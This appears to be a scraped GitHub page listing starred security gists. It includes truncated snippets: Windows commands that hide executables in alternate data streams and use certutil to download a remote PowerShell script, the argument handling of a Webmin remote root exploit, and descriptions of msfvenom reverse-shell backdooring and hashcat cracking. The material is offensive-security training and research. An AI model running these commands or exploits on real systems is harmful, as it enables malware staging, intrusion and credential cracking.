Skip to content

Instantly share code, notes, and snippets.

View b4cktr4ck2's full-sized avatar

Alex Kozlov b4cktr4ck2

View GitHub Profile
@haccer
haccer / scanio.sh
Last active July 3, 2025 21:27
PoC script to mass-locate vulnerable subdomains using results from Rapid7's Project Sonar
#!/bin/bash
# Usage : ./scanio.sh <save file>
# Example: ./scanio.sh cname_list.txt
# Premium
function ech() {
spinner=( "|" "/" "-" "\\" )
while true; do
for i in ${spinner[@]}; do
echo -ne "\r[$i] $1"
@api0cradle
api0cradle / Exe_ADS_Methods.md
Last active July 6, 2026 15:43
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Escalate
  5. Document it

Time yourself

@oxagast
oxagast / wmsploit-remote-root-1.29-reprise.sh
Created April 26, 2017 11:10
Webmin Remote root <1.29 exploit
HOST=$1;
PORT=$2;
LHOST=$3;
LPORT=$4;
if [ $# -lt 4 ]
then
echo "Webmin <1.29 remote root exploit by oxagast"
echo "Priv esc by directory transversal to find cookie in logfile file as root, then session highjack into RCE.";
echo "Thanks to UmZ for directory transversal attack; greets to enki for asking me to try this!";
echo "Usage:"
@mgeeky
mgeeky / msfvenom-reverse-tcp-WaitForSingleObject.md
Last active January 16, 2025 19:33
(OSCE/CTP, Module #3: Backdooring PE Files) Document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches.

Looking for WaitForSingleObject call within modern msfvenom generated payload.


Abstract

This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It has been written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.

Contents:

@koenrh
koenrh / gcp-gpu-vm-hashcat.md
Last active June 23, 2025 01:06
Running Hashcat on Google Cloud's new GPU-based VMs

Running Hashcat on Google Cloud's GPU-based VMs

In February 2017, Google announced the availability GPU-based VMs. I spun up a few of these instances, and ran some benchmarks. Along the way, I wrote down the steps taken to provision these VM instances, and install relevant drivers.

Update April 2019: Updated instructions to use instances with the Tesla T4 GPUs.

@mubix
mubix / infosec_newbie.md
Last active July 11, 2026 23:01
How to start in Infosec

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

@noahwilliamsson
noahwilliamsson / hostapd.conf
Created November 5, 2015 22:48
WPA-EAP (Enterprise) configuration for hostapd
interface=wlan0
# --------------------------------------
bss=wlan1
ssid=EAP
# IEEE 802.11 specifies two authentication algorithms. hostapd can be
# configured to allow both of these or only one. Open system authentication
# should be used with IEEE 802.1X.
# Bit fields of allowed authentication algorithms:
# bit 0 = Open System Authentication
@miek
miek / GSG case
Last active April 20, 2026 22:23
Unofficial case for YARD Stick One and Ubertooth One from Great Scott Gadgets - http://greatscottgadgets.com/